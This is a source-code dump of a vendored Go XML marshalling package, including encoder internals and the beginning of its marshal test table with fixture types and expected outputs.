*StartElement, name Name, val reflect.Value) error { if val.CanInterface() && val.Type().Implements(marshalerAttrType) { attr, err := val.Interface().(MarshalerAttr).MarshalXMLAttr(name) if err != nil { return err } if attr.Name.Local != "" { start.Attr = append(start.Attr, attr) } return nil } if val.CanAddr() { pv := val.Addr() if pv.CanInterface() && pv.Type().Implements(marshalerAttrType) { attr, err := pv.Interface().(MarshalerAttr).MarshalXMLAttr(name) if err != nil { return err } if attr.Name.Local != "" { start.Attr = append(start.Attr, attr) } return nil } } if val.CanInterface() && val.Type().Implements(textMarshalerType) { text, err := val.Interface().(encoding.TextMarshaler).MarshalText() if err != nil { return err } start.Attr = append(start.Attr, Attr{name, string(text), ""}) return nil } if val.CanAddr() { pv := val.Addr() if pv.CanInterface() && pv.Type().Implements(textMarshalerType) { text, err := pv.Interface().(encoding.TextMarshaler).MarshalText() if err != nil { return err } start.Attr = append(start.Attr, Attr{name, string(text), ""}) return nil } } // Dereference or skip nil pointer, interface values. switch val.Kind() { case reflect.Pointer, reflect.Interface: if val.IsNil() { return nil } val = val.Elem() } // Walk slices. if val.Kind() == reflect.Slice && val.Type().Elem().Kind() != reflect.Uint8 { n := val.Len() for i := 0; i < n; i++ { if err := p.marshalAttr(start, name, val.Index(i)); err != nil { return err } } return nil } if val.Type() == attrType { start.Attr = append(start.Attr, val.Interface().(Attr)) return nil } s, b, err := p.marshalSimple(val.Type(), val) if err != nil { return err } if b != nil { s = string(b) } start.Attr = append(start.Attr, Attr{name, s, ""}) return nil } // defaultStart returns the default start element to use, // given the reflect type, field info, and start template. func defaultStart(typ reflect.Type, finfo *fieldInfo, startTemplate *StartElement) StartElement { var start StartElement // Precedence for the XML element name is as above, // except that we do not look inside structs for the first field. if startTemplate != nil { start.Name = startTemplate.Name start.Attr = append(start.Attr, startTemplate.Attr...) } else if finfo != nil && finfo.name != "" { start.Name.Local = finfo.name start.Name.Space = finfo.xmlns } else if typ.Name() != "" { start.Name.Local = typ.Name() } else { // Must be a pointer to a named type, // since it has the Marshaler methods. start.Name.Local = typ.Elem().Name() } return start } // marshalInterface marshals a Marshaler interface value. func (p *printer) marshalInterface(val Marshaler, start StartElement) error { // Push a marker onto the tag stack so that MarshalXML // cannot close the XML tags that it did not open. p.tags = append(p.tags, Name{}) n := len(p.tags) err := val.MarshalXML(p.encoder, start) if err != nil { return err } // Make sure MarshalXML closed all its tags. p.tags[n-1] is the mark. if len(p.tags) > n { return fmt.Errorf("xml: %s.MarshalXML wrote invalid XML: <%s> not closed", receiverType(val), p.tags[len(p.tags)-1].Local) } p.tags = p.tags[:n-1] return nil } // marshalTextInterface marshals a TextMarshaler interface value. func (p *printer) marshalTextInterface(val encoding.TextMarshaler, start StartElement) error { if err := p.writeStart(&start); err != nil { return err } text, err := val.MarshalText() if err != nil { return err } EscapeText(p, text) return p.writeEnd(start.Name, start.Empty) } // writeStart writes the given start element. func (p *printer) writeStart(start *StartElement) error { if start.Name.Local == "" { return fmt.Errorf("xml: start tag with no name") } p.tags = append(p.tags, start.Name) p.markPrefix() p.writeIndent(1) p.WriteByte('<') p.WriteString(start.Name.Local) if start.Name.Space != "" { p.WriteString(` xmlns="`) p.EscapeString(start.Name.Space, false) p.WriteByte('"') } // Attributes for _, attr := range start.Attr { name := attr.Name if name.Local == "" { continue } if attr.Diff == "" { p.WriteByte(' ') } else { p.WriteString(attr.Diff) } if name.Space != "" { p.WriteString(p.createAttrPrefix(name.Space)) p.WriteByte(':') } p.WriteString(name.Local) p.WriteString(`="`) p.EscapeString(attr.Value, true) p.WriteByte('"') } p.WriteString(start.Diff) if start.Empty { p.WriteByte('/') } p.WriteByte('>') return nil } func (p *printer) writeEnd(name Name, empty bool) error { if name.Local == "" { return fmt.Errorf("xml: end tag with no name") } if len(p.tags) == 0 || p.tags[len(p.tags)-1].Local == "" { return fmt.Errorf("xml: end tag without start tag", name.Local) } if top := p.tags[len(p.tags)-1]; top != name { if top.Local != name.Local { return fmt.Errorf("xml: end tag does not match start tag <%s>", name.Local, top.Local) } return fmt.Errorf("xml: end tag in namespace %s does not match start tag <%s> in namespace %s", name.Local, name.Space, top.Local, top.Space) } p.tags = p.tags[:len(p.tags)-1] if !empty { p.writeIndent(-1) p.WriteByte('<') p.WriteByte('/') p.WriteString(name.Local) p.WriteByte('>') } p.popPrefix() return nil } func (p *printer) marshalSimple(typ reflect.Type, val reflect.Value) (string, []byte, error) { switch val.Kind() { case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: return strconv.FormatInt(val.Int(), 10), nil, nil case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: return strconv.FormatUint(val.Uint(), 10), nil, nil case reflect.Float32, reflect.Float64: return strconv.FormatFloat(val.Float(), 'g', -1, val.Type().Bits()), nil, nil case reflect.String: return val.String(), nil, nil case reflect.Bool: return strconv.FormatBool(val.Bool()), nil, nil case reflect.Array: if typ.Elem().Kind() != reflect.Uint8 { break } // [...]byte var bytes []byte if val.CanAddr() { bytes = val.Bytes() } else { bytes = make([]byte, val.Len()) reflect.Copy(reflect.ValueOf(bytes), val) } return "", bytes, nil case reflect.Slice: if typ.Elem().Kind() != reflect.Uint8 { break } // []byte return "", val.Bytes(), nil } return "", nil, &UnsupportedTypeError{typ} } var ddBytes = []byte("--") // indirect drills into interfaces and pointers, returning the pointed-at value. // If it encounters a nil interface or pointer, indirect returns that nil value. // This can turn into an infinite loop given a cyclic chain, // but it matches the Go 1 behavior. func indirect(vf reflect.Value) reflect.Value { for vf.Kind() == reflect.Interface || vf.Kind() == reflect.Pointer { if vf.IsNil() { return vf } vf = vf.Elem() } return vf } func (p *printer) marshalStruct(tinfo *typeInfo, val reflect.Value) error { s := parentStack{p: p} for i := range tinfo.fields { finfo := &tinfo.fields[i] if finfo.flags&fAttr != 0 { continue } vf := finfo.value(val, dontInitNilPointers) if !vf.IsValid() { // The field is behind an anonymous struct field that's // nil. Skip it. continue } switch finfo.flags & fMode { case fCDATA, fCharData: emit := EscapeText if finfo.flags&fMode == fCDATA { emit = emitCDATA } if err := s.trim(finfo.parents); err != nil { return err } if vf.CanInterface() && vf.Type().Implements(textMarshalerType) { data, err := vf.Interface().(encoding.TextMarshaler).MarshalText() if err != nil { return err } if err := emit(p, data); err != nil { return err } continue } if vf.CanAddr() { pv := vf.Addr() if pv.CanInterface() && pv.Type().Implements(textMarshalerType) { data, err := pv.Interface().(encoding.TextMarshaler).MarshalText() if err != nil { return err } if err := emit(p, data); err != nil { return err } continue } } var scratch [64]byte vf = indirect(vf) switch vf.Kind() { case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: if err := emit(p, strconv.AppendInt(scratch[:0], vf.Int(), 10)); err != nil { return err } case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: if err := emit(p, strconv.AppendUint(scratch[:0], vf.Uint(), 10)); err != nil { return err } case reflect.Float32, reflect.Float64: if err := emit(p, strconv.AppendFloat(scratch[:0], vf.Float(), 'g', -1, vf.Type().Bits())); err != nil { return err } case reflect.Bool: if err := emit(p, strconv.AppendBool(scratch[:0], vf.Bool())); err != nil { return err } case reflect.String: if err := emit(p, []byte(vf.String())); err != nil { return err } case reflect.Slice: if elem, ok := vf.Interface().([]byte); ok { if err := emit(p, elem); err != nil { return err } } } continue case fComment: if err := s.trim(finfo.parents); err != nil { return err } vf = indirect(vf) k := vf.Kind() if !(k == reflect.String || k == reflect.Slice && vf.Type().Elem().Kind() == reflect.Uint8) { return fmt.Errorf("xml: bad type for comment field of %s", val.Type()) } if vf.Len() == 0 { continue } p.writeIndent(0) p.WriteString("" is invalid grammar. Make it "- -->" p.WriteByte(' ') } p.WriteString("-->") continue case fInnerXML: vf = indirect(vf) iface := vf.Interface() switch raw := iface.(type) { case []byte: p.Write(raw) continue case string: p.WriteString(raw) continue } case fElement, fElement | fAny: if err := s.trim(finfo.parents); err != nil { return err } if len(finfo.parents) > len(s.stack) { if vf.Kind() != reflect.Pointer && vf.Kind() != reflect.Interface || !vf.IsNil() { if err := s.push(finfo.parents[len(s.stack):]); err != nil { return err } } } } if err := p.marshalValue(vf, finfo, nil); err != nil { return err } } s.trim(nil) return p.cachedWriteError() } // Write implements io.Writer func (p *printer) Write(b []byte) (n int, err error) { if p.closed && p.err == nil { p.err = errors.New("use of closed Encoder") } if p.err == nil { n, p.err = p.w.Write(b) } return n, p.err } // WriteString implements io.StringWriter func (p *printer) WriteString(s string) (n int, err error) { if p.closed && p.err == nil { p.err = errors.New("use of closed Encoder") } if p.err == nil { n, p.err = p.w.WriteString(s) } return n, p.err } // WriteByte implements io.ByteWriter func (p *printer) WriteByte(c byte) error { if p.closed && p.err == nil { p.err = errors.New("use of closed Encoder") } if p.err == nil { p.err = p.w.WriteByte(c) } return p.err } // Close the Encoder, indicating that no more data will be written. It flushes // any buffered XML to the underlying writer and returns an error if the // written XML is invalid (e.g. by containing unclosed elements). func (p *printer) Close() error { if p.closed { return nil } p.closed = true if err := p.w.Flush(); err != nil { return err } if len(p.tags) > 0 { return fmt.Errorf("unclosed tag <%s>", p.tags[len(p.tags)-1].Local) } return nil } // return the bufio Writer's cached write error func (p *printer) cachedWriteError() error { _, err := p.Write(nil) return err } func (p *printer) writeIndent(depthDelta int) { if len(p.prefix) == 0 && len(p.indent) == 0 { return } if depthDelta < 0 { p.depth-- if p.indentedIn { p.indentedIn = false return } p.indentedIn = false } if p.putNewline { p.WriteByte('\n') } else { p.putNewline = true } if len(p.prefix) > 0 { p.WriteString(p.prefix) } if len(p.indent) > 0 { for i := 0; i < p.depth; i++ { p.WriteString(p.indent) } } if depthDelta > 0 { p.depth++ p.indentedIn = true } } type parentStack struct { p *printer stack []string } // trim updates the XML context to match the longest common prefix of the stack // and the given parents. A closing tag will be written for every parent // popped. Passing a zero slice or nil will close all the elements. func (s *parentStack) trim(parents []string) error { split := 0 for ; split < len(parents) && split < len(s.stack); split++ { if parents[split] != s.stack[split] { break } } for i := len(s.stack) - 1; i >= split; i-- { if err := s.p.writeEnd(Name{Local: s.stack[i]}, false); err != nil { return err } } s.stack = s.stack[:split] return nil } // push adds parent elements to the stack and writes open tags. func (s *parentStack) push(parents []string) error { for i := 0; i < len(parents); i++ { if err := s.p.writeStart(&StartElement{Name: Name{Local: parents[i]}}); err != nil { return err } } s.stack = append(s.stack, parents...) return nil } // UnsupportedTypeError is returned when [Marshal] encounters a type // that cannot be converted into XML. type UnsupportedTypeError struct { Type reflect.Type } func (e *UnsupportedTypeError) Error() string { return "xml: unsupported type: " + e.Type.String() } func isEmptyValue(v reflect.Value) bool { switch v.Kind() { case reflect.Array, reflect.Map, reflect.Slice, reflect.String: return v.Len() == 0 case reflect.Bool, reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr, reflect.Float32, reflect.Float64, reflect.Interface, reflect.Pointer: return v.IsZero() } return false } ================================================ FILE: internal/thirdparty/xml/marshal_test.go ================================================ // Copyright 2011 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package xml import ( "bytes" "errors" "fmt" "io" "reflect" "strconv" "strings" "sync" "testing" "time" ) type DriveType int const ( HyperDrive DriveType = iota ImprobabilityDrive ) type Passenger struct { Name []string `xml:"name"` Weight float32 `xml:"weight"` } type Ship struct { XMLName struct{} `xml:"spaceship"` Name string `xml:"name,attr"` Pilot string `xml:"pilot,attr"` Drive DriveType `xml:"drive"` Age uint `xml:"age"` Passenger []*Passenger `xml:"passenger"` secret string } type NamedType string type Port struct { XMLName struct{} `xml:"port"` Type string `xml:"type,attr,omitempty"` Comment string `xml:",comment"` Number string `xml:",chardata"` } type Domain struct { XMLName struct{} `xml:"domain"` Country string `xml:",attr,omitempty"` Name []byte `xml:",chardata"` Comment []byte `xml:",comment"` } type Book struct { XMLName struct{} `xml:"book"` Title string `xml:",chardata"` } type Event struct { XMLName struct{} `xml:"event"` Year int `xml:",chardata"` } type Movie struct { XMLName struct{} `xml:"movie"` Length uint `xml:",chardata"` } type Pi struct { XMLName struct{} `xml:"pi"` Approximation float32 `xml:",chardata"` } type Universe struct { XMLName struct{} `xml:"universe"` Visible float64 `xml:",chardata"` } type Particle struct { XMLName struct{} `xml:"particle"` HasMass bool `xml:",chardata"` } type Departure struct { XMLName struct{} `xml:"departure"` When time.Time `xml:",chardata"` } type SecretAgent struct { XMLName struct{} `xml:"agent"` Handle string `xml:"handle,attr"` Identity string Obfuscate string `xml:",innerxml"` } type NestedItems struct { XMLName struct{} `xml:"result"` Items []string `xml:">item"` Item1 []string `xml:"Items>item1"` } type NestedOrder struct { XMLName struct{} `xml:"result"` Field1 string `xml:"parent>c"` Field2 string `xml:"parent>b"` Field3 string `xml:"parent>a"` } type MixedNested struct { XMLName struct{} `xml:"result"` A string `xml:"parent1>a"` B string `xml:"b"` C string `xml:"parent1>parent2>c"` D string `xml:"parent1>d"` } type NilTest struct { A any `xml:"parent1>parent2>a"` B any `xml:"parent1>b"` C any `xml:"parent1>parent2>c"` } type Service struct { XMLName struct{} `xml:"service"` Domain *Domain `xml:"host>domain"` Port *Port `xml:"host>port"` Extra1 any Extra2 any `xml:"host>extra2"` } var nilStruct *Ship type EmbedA struct { EmbedC EmbedB EmbedB FieldA string embedD } type EmbedB struct { FieldB string *EmbedC } type EmbedC struct { FieldA1 string `xml:"FieldA>A1"` FieldA2 string `xml:"FieldA>A2"` FieldB string FieldC string } type embedD struct { fieldD string FieldE string // Promoted and visible when embedD is embedded. } type NameCasing struct { XMLName struct{} `xml:"casing"` Xy string XY string XyA string `xml:"Xy,attr"` XYA string `xml:"XY,attr"` } type NamePrecedence struct { XMLName Name `xml:"Parent"` FromTag XMLNameWithoutTag `xml:"InTag"` FromNameVal XMLNameWithoutTag FromNameTag XMLNameWithTag InFieldName string } type XMLNameWithTag struct { XMLName Name `xml:"InXMLNameTag"` Value string `xml:",chardata"` } type XMLNameWithoutTag struct { XMLName Name Value string `xml:",chardata"` } type NameInField struct { Foo Name `xml:"ns foo"` } type AttrTest struct { Int int `xml:",attr"` Named int `xml:"int,attr"` Float float64 `xml:",attr"` Uint8 uint8 `xml:",attr"` Bool bool `xml:",attr"` Str string `xml:",attr"` Bytes []byte `xml:",attr"` } type AttrsTest struct { Attrs []Attr `xml:",any,attr"` Int int `xml:",attr"` Named int `xml:"int,attr"` Float float64 `xml:",attr"` Uint8 uint8 `xml:",attr"` Bool bool `xml:",attr"` Str string `xml:",attr"` Bytes []byte `xml:",attr"` } type OmitAttrTest struct { Int int `xml:",attr,omitempty"` Named int `xml:"int,attr,omitempty"` Float float64 `xml:",attr,omitempty"` Uint8 uint8 `xml:",attr,omitempty"` Bool bool `xml:",attr,omitempty"` Str string `xml:",attr,omitempty"` Bytes []byte `xml:",attr,omitempty"` PStr *string `xml:",attr,omitempty"` } type OmitFieldTest struct { Int int `xml:",omitempty"` Named int `xml:"int,omitempty"` Float float64 `xml:",omitempty"` Uint8 uint8 `xml:",omitempty"` Bool bool `xml:",omitempty"` Str string `xml:",omitempty"` Bytes []byte `xml:",omitempty"` PStr *string `xml:",omitempty"` Ptr *PresenceTest `xml:",omitempty"` } type AnyTest struct { XMLName struct{} `xml:"a"` Nested string `xml:"nested>value"` AnyField AnyHolder `xml:",any"` } type AnyOmitTest struct { XMLName struct{} `xml:"a"` Nested string `xml:"nested>value"` AnyField *AnyHolder `xml:",any,omitempty"` } type AnySliceTest struct { XMLName struct{} `xml:"a"` Nested string `xml:"nested>value"` AnyField []AnyHolder `xml:",any"` } type AnyHolder struct { XMLName Name XML string `xml:",innerxml"` } type RecurseA struct { A string B *RecurseB } type RecurseB struct { A *RecurseA B string } type PresenceTest struct { Exists *struct{} } type IgnoreTest struct { PublicSecret string `xml:"-"` } type MyBytes []byte type Data struct { Bytes []byte Attr []byte `xml:",attr"` Custom MyBytes } type Plain struct { V any } type MyInt int type EmbedInt struct { MyInt } type Strings struct { X []string `xml:"A>B,omitempty"` } type PointerFieldsTest struct { XMLName Name `xml:"dummy"` Name *string `xml:"name,attr"` Age *uint `xml:"age,attr"` Empty *string `xml:"empty,attr"` Contents *string `xml:",chardata"` } type ChardataEmptyTest struct { XMLName Name `xml:"test"` Contents *string `xml:",chardata"` } type PointerAnonFields struct { *MyInt *NamedType } type MyMarshalerTest struct { } var _ Marshaler = (*MyMarshalerTest)(nil) func (m *MyMarshalerTest) MarshalXML(e *Encoder, start StartElement) error { e.EncodeToken(start) e.EncodeToken(CharData{data: []byte("hello world")}) e.EncodeToken(EndElement{start.Name, false}) return nil } type MyMarshalerAttrTest struct { } var _ MarshalerAttr = (*MyMarshalerAttrTest)(nil) func (m *MyMarshalerAttrTest) MarshalXMLAttr(name Name) (Attr, error) { return Attr{name, "hello world", ""}, nil } func (m *MyMarshalerAttrTest) UnmarshalXMLAttr(attr Attr) error { return nil } type MarshalerStruct struct { Foo MyMarshalerAttrTest `xml:",attr"` } type InnerStruct struct { XMLName Name `xml:"testns outer"` } type OuterStruct struct { InnerStruct IntAttr int `xml:"int,attr"` } type OuterNamedStruct struct { InnerStruct XMLName Name `xml:"outerns test"` IntAttr int `xml:"int,attr"` } type OuterNamedOrderedStruct struct { XMLName Name `xml:"outerns test"` InnerStruct IntAttr int `xml:"int,attr"` } type OuterOuterStruct struct { OuterStruct } type NestedAndChardata struct { AB []string `xml:"A>B"` Chardata string `xml:",chardata"` } type NestedAndComment struct { AB []string `xml:"A>B"` Comment string `xml:",comment"` } type CDataTest struct { Chardata string `xml:",cdata"` } type NestedAndCData struct { AB []string `xml:"A>B"` CDATA string `xml:",cdata"` } func ifaceptr(x any) any { return &x } func stringptr(x string) *string { return &x } type T1 struct{} type T2 struct{} type IndirComment struct { T1 T1 Comment *string `xml:",comment"` T2 T2 } type DirectComment struct { T1 T1 Comment string `xml:",comment"` T2 T2 } type IfaceComment struct { T1 T1 Comment any `xml:",comment"` T2 T2 } type IndirChardata struct { T1 T1 Chardata *string `xml:",chardata"` T2 T2 } type DirectChardata struct { T1 T1 Chardata string `xml:",chardata"` T2 T2 } type IfaceChardata struct { T1 T1 Chardata any `xml:",chardata"` T2 T2 } type IndirCDATA struct { T1 T1 CDATA *string `xml:",cdata"` T2 T2 } type DirectCDATA struct { T1 T1 CDATA string `xml:",cdata"` T2 T2 } type IfaceCDATA struct { T1 T1 CDATA any `xml:",cdata"` T2 T2 } type IndirInnerXML struct { T1 T1 InnerXML *string `xml:",innerxml"` T2 T2 } type DirectInnerXML struct { T1 T1 InnerXML string `xml:",innerxml"` T2 T2 } type IfaceInnerXML struct { T1 T1 InnerXML any `xml:",innerxml"` T2 T2 } type IndirElement struct { T1 T1 Element *string T2 T2 } type DirectElement struct { T1 T1 Element string T2 T2 } type IfaceElement struct { T1 T1 Element any T2 T2 } type IndirOmitEmpty struct { T1 T1 OmitEmpty *string `xml:",omitempty"` T2 T2 } type DirectOmitEmpty struct { T1 T1 OmitEmpty string `xml:",omitempty"` T2 T2 } type IfaceOmitEmpty struct { T1 T1 OmitEmpty any `xml:",omitempty"` T2 T2 } type IndirAny struct { T1 T1 Any *string `xml:",any"` T2 T2 } type DirectAny struct { T1 T1 Any string `xml:",any"` T2 T2 } type IfaceAny struct { T1 T1 Any any `xml:",any"` T2 T2 } type Generic[T any] struct { X T } var ( nameAttr = "Sarah" ageAttr = uint(12) contentsAttr = "lorem ipsum" empty = "" ) // Unless explicitly stated as such (or *Plain), all of the // tests below are two-way tests. When introducing new tests, // please try to make them two-way as well to ensure that // marshaling and unmarshaling are as symmetrical as feasible. var marshalTests = []struct { Value any ExpectXML string MarshalOnly bool MarshalError string UnmarshalOnly bool UnmarshalError string }{ // Test nil marshals to nothing {Value: nil, ExpectXML: ``, MarshalOnly: true}, {Value: nilStruct, ExpectXML: ``, MarshalOnly: true}, // Test value types {Value: &Plain{true}, ExpectXML: `true`}, {Value: &Plain{false}, ExpectXML: `false`}, {Value: &Plain{int(42)}, ExpectXML: `42`}, {Value: &Plain{int8(42)}, ExpectXML: `42`}, {Value: &Plain{int16(42)}, ExpectXML: `42`}, {Value: &Plain{int32(42)}, ExpectXML: `42`}, {Value: &Plain{uint(42)}, ExpectXML: `42`}, {Value: &Plain{uint8(42)}, ExpectXML: `42`}, {Value: &Plain{uint16(42)}, ExpectXML: `42`}, {Value: &Plain{uint32(42)}, ExpectXML: `42`}, {Value: &Plain{float32(1.25)}, ExpectXML: `1.25`}, {Value: &Plain{float64(1.25)}, ExpectXML: `1.25`}, {Value: &Plain{uintptr(0xFFDD)}, ExpectXML: `65501`}, {Value: &Plain{"gopher"}, ExpectXML: `gopher`}, {Value: &Plain{[]byte("gopher")}, ExpectXML: `gopher`}, {Value: &Plain{""}, ExpectXML: `</>`}, {Value: &Plain{[]byte("")}, ExpectXML: `</>`}, {Value: &Plain{[3]byte{'<', '/', '>'}}, ExpectXML: `</>`}, {Value: &Plain{NamedType("potato")}, ExpectXML: `potato`}, {Value: &Plain{[]int{1, 2, 3}}, ExpectXML: `123`}, {Value: &Plain{[3]int{1, 2, 3}}, ExpectXML: `123`}, {Value: ifaceptr(true), MarshalOnly: true, ExpectXML: `true`}, // Test time. { Value: &Plain{time.Unix(1e9, 123456789).UTC()}, ExpectXML: `2001-09-09T01:46:40.123456789Z`, }, // A pointer to struct{} may be used to test for an element's presence. { Value: &PresenceTest{new(struct{})}, ExpectXML: ``, }, { Value: &PresenceTest{}, ExpectXML: ``, }, // A []byte field is only nil if the element was not found. { Value: &Data{}, ExpectXML: ``, UnmarshalOnly: true, }, { Value: &Data{Bytes: []byte{}, Custom: MyBytes{}, Attr: []byte{}}, ExpectXML: ``, UnmarshalOnly: true, }, // Check that []byte works, including named []byte types. { Value: &Data{Bytes: []byte("ab"), Custom: MyBytes("cd"), Attr: []byte{'v'}}, ExpectXML: `abcd`, }, // Test innerxml { Value: &SecretAgent{ Handle: "007", Identity: "James Bond", Obfuscate: "", }, ExpectXML: `James Bond`, MarshalOnly: true, }, { Value: &SecretAgent{ Handle: "007", Identity: "James Bond", Obfuscate: "James Bond", }, ExpectXML: `James Bond`, UnmarshalOnly: true, }, // Test structs {Value: &Port{Type: "ssl", Number: "443"}, ExpectXML: `443`}, {Value: &Port{Number: "443"}, ExpectXML: `443`}, {Value: &Port{Type: ""}, ExpectXML: ``}, {Value: &Port{Number: "443", Comment: "https"}, ExpectXML: `443`}, {Value: &Port{Number: "443", Comment: "add space-"}, ExpectXML: `443`, MarshalOnly: true}, {Value: &Domain{Name: []byte("google.com&friends")}, ExpectXML: `google.com&friends`}, {Value: &Domain{Name: []byte("google.com"), Comment: []byte(" &friends ")}, ExpectXML: `google.com`}, {Value: &Book{Title: "Pride & Prejudice"}, ExpectXML: `Pride & Prejudice`}, {Value: &Event{Year: -3114}, ExpectXML: `-3114`}, {Value: &Movie{Length: 13440}, ExpectXML: `13440`}, {Value: &Pi{Approximation: 3.14159265}, ExpectXML: `3.1415927`}, {Value: &Universe{Visible: 9.3e13}, ExpectXML: `9.3e+13`}, {Value: &Particle{HasMass: true}, ExpectXML: `true`}, {Value: &Departure{When: ParseTime("2013-01-09T00:15:00-09:00")}, ExpectXML: `2013-01-09T00:15:00-09:00`}, {Value: atomValue, ExpectXML: atomXML}, {Value: &Generic[int]{1}, ExpectXML: `1`}, { Value: &Ship{ Name: "Heart of Gold", Pilot: "Computer", Age: 1, Drive: ImprobabilityDrive, Passenger: []*Passenger{ { Name: []string{"Zaphod", "Beeblebrox"}, Weight: 7.25, }, { Name: []string{"Trisha", "McMillen"}, Weight: 5.5, }, { Name: []string{"Ford", "Prefect"}, Weight: 7, }, { Name: []string{"Arthur", "Dent"}, Weight: 6.75, }, }, }, ExpectXML: `` + `` + strconv.Itoa(int(ImprobabilityDrive)) + `` + `1` + `` + `Zaphod` + `Beeblebrox` + `7.25` + `` + `` + `Trisha` + `McMillen` + `5.5` + `` + `` + `Ford` + `Prefect` + `7` + `` + `` + `Arthur` + `Dent` + `6.75` + `` + ``, }, // Test a>b { Value: &NestedItems{Items: nil, Item1: nil}, ExpectXML: `` + `` + `` + ``, }, { Value: &NestedItems{Items: []string{}, Item1: []string{}}, ExpectXML: `` + `` + `` + ``, MarshalOnly: true, }, { Value: &NestedItems{Items: nil, Item1: []string{"A"}}, ExpectXML: `` + `` + `A` + `` + ``, }, { Value: &NestedItems{Items: []string{"A", "B"}, Item1: nil}, ExpectXML: `` + `` + `A` + `B` + `` + ``, }, { Value: &NestedItems{Items: []string{"A", "B"}, Item1: []string{"C"}}, ExpectXML: `` + `` + `A` + `B` + `C` + `` + ``, }, { Value: &NestedOrder{Field1: "C", Field2: "B", Field3: "A"}, ExpectXML: `` + `` + `C` + `B` + `A` + `` + ``, }, { Value: &NilTest{A: "A", B: nil, C: "C"}, ExpectXML: `` + `` + `A` + `C` + `` + ``, MarshalOnly: true, // Uses interface{} }, { Value: &MixedNested{A: "A", B: "B", C: "C", D: "D"}, ExpectXML: `` + `A` + `B` + `` + `C` + `D` + `` + ``, }, { Value: &Service{Port: &Port{Number: "80"}}, ExpectXML: `80`, }, { Value: &Service{}, ExpectXML: ``, }, { Value: &Service{Port: &Port{Number: "80"}, Extra1: "A", Extra2: "B"}, ExpectXML: `` + `80` + `A` + `B` + ``, MarshalOnly: true, }, { Value: &Service{Port: &Port{Number: "80"}, Extra2: "example"}, ExpectXML: `` + `80` + `example` + ``, MarshalOnly: true, }, { Value: &struct { XMLName struct{} `xml:"space top"` A string `xml:"x>a"` B string `xml:"x>b"` C string `xml:"space x>c"` C1 string `xml:"space1 x>c"` D1 string `xml:"space1 x>d"` }{ A: "a", B: "b", C: "c", C1: "c1", D1: "d1", }, ExpectXML: `` + `abc` + `c1` + `d1` + `` + ``, }, { Value: &struct { XMLName Name A string `xml:"x>a"` B string `xml:"x>b"` C string `xml:"space x>c"` C1 string `xml:"space1 x>c"` D1 string `xml:"space1 x>d"` }{ XMLName: Name{ Space: "space0", Local: "top", }, A: "a", B: "b", C: "c", C1: "c1", D1: "d1", }, ExpectXML: `` + `ab` + `c` + `c1` + `d1` + `` + ``, }, { Value: &struct { XMLName struct{} `xml:"top"` B string `xml:"space x>b"` B1 string `xml:"space1 x>b"` }{ B: "b", B1: "b1", }, ExpectXML: `` + `b` + `b1` + ``, }, // Test struct embedding { Value: &EmbedA{ EmbedC: EmbedC{ FieldA1: "", // Shadowed by A.A FieldA2: "", // Shadowed by A.A FieldB: "A.C.B", FieldC: "A.C.C", }, EmbedB: EmbedB{ FieldB: "A.B.B", EmbedC: &EmbedC{ FieldA1: "A.B.C.A1", FieldA2: "A.B.C.A2", FieldB: "", // Shadowed by A.B.B FieldC: "A.B.C.C", }, }, FieldA: "A.A", embedD: embedD{ FieldE: "A.D.E", }, }, ExpectXML: `` + `A.C.B` + `A.C.C` + `` + `A.B.B` + `` + `A.B.C.A1` + `A.B.C.A2` + `` + `A.B.C.C` + `` + `A.A` + `A.D.E` + ``, }, // Anonymous struct pointer field which is nil { Value: &EmbedB{}, ExpectXML: ``, }, // Other kinds of nil anonymous fields { Value: &PointerAnonFields{}, ExpectXML: ``, }, // Test that name casing matters { Value: &NameCasing{Xy: "mixed", XY: "upper", XyA: "mixedA", XYA: "upperA"}, ExpectXML: `mixedupper`, }, // Test the order in which the XML element name is chosen { Value: &NamePrecedence{ FromTag: XMLNameWithoutTag{Value: "A"}, FromNameVal: XMLNameWithoutTag{XMLName: Name{Local: "InXMLName"}, Value: "B"}, FromNameTag: XMLNameWithTag{Value: "C"}, InFieldName: "D", }, ExpectXML: `` + `A` + `B` + `C` + `D` + ``, MarshalOnly: true, }, { Value: &NamePrecedence{ XMLName: Name{Local: "Parent"}, FromTag: XMLNameWithoutTag{XMLName: Name{Local: "InTag"}, Value: "A"}, FromNameVal: XMLNameWithoutTag{XMLName: Name{Local: "FromNameVal"}, Value: "B"}, FromNameTag: XMLNameWithTag{XMLName: Name{Local: "InXMLNameTag"}, Value: "C"}, InFieldName: "D", }, ExpectXML: `` + `A` + `B` + `C` + `D` + ``, UnmarshalOnly: true, }, // xml.Name works in a plain field as well. { Value: &NameInField{Name{Space: "ns", Local: "foo"}}, ExpectXML: ``, }, { Value: &NameInField{Name{Space: "ns", Local: "foo"}}, ExpectXML: ``, UnmarshalOnly: true, }, // Marshaling zero xml.Name uses the tag or field name. { Value: &NameInField{}, ExpectXML: ``, MarshalOnly: true, }, // Test attributes { Value: &AttrTest{ Int: 8, Named: 9, Float: 23.5, Uint8: 255, Bool: true, Str: "str", Bytes: []byte("byt"), }, ExpectXML: ``, }, { Value: &AttrTest{Bytes: []byte{}}, ExpectXML: ``, }, { Value: &AttrsTest{ Attrs: []Attr{ {Name: Name{Local: "Answer"}, Value: "42"}, {Name: Name{Local: "Int"}, Value: "8"}, {Name: Name{Local: "int"}, Value: "9"}, {Name: Name{Local: "Float"}, Value: "23.5"}, {Name: Name{Local: "Uint8"}, Value: "255"}, {Name: Name{Local: "Bool"}, Value: "true"}, {Name: Name{Local: "Str"}, Value: "str"}, {Name: Name{Local: "Bytes"}, Value: "byt"}, }, }, ExpectXML: ``, MarshalOnly: true, }, { Value: &AttrsTest{ Attrs: []Attr{ {Name: Name{Local: "Answer"}, Value: "42"}, }, Int: 8, Named: 9, Float: 23.5, Uint8: 255, Bool: true, Str: "str", Bytes: []byte("byt"), }, ExpectXML: ``, }, { Value: &AttrsTest{ Attrs: []Attr{ {Name: Name{Local: "Int"}, Value: "0"}, {Name: Name{Local: "int"}, Value: "0"}, {Name: Name{Local: "Float"}, Value: "0"}, {Name: Name{Local: 